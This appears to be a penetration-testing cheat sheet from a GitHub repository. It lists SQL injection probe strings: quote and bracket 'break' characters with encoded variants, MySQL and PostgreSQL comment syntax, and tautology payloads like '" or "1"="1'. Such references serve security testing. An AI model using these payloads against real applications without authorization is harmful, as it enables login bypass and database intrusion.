Skip to content

Latest commit

 

History

History
69 lines (62 loc) · 663 Bytes

SQLi-query-Join-and-Break.md

File metadata and controls

69 lines (62 loc) · 663 Bytes

Query Break

'
%27
"
%22
#
%23
;
%3B
)
`
')
")
`)
'))
"))
`))
Wildcard (*)
'  # required for XML content
'/*
'/\*
';--
*/
  • Multiple encoding
%%2727
%25%27

Query Join

  • MySQL
#comment
-- comment     [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */
  • PostgreSQL
--comment
/*comment*/
  • more ways to break
' -- -
'--'
"--"
') or true--
" or "1"="1
" or "1"="1"#
" or "1"="1"/*
"or 1=1 or ""="
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*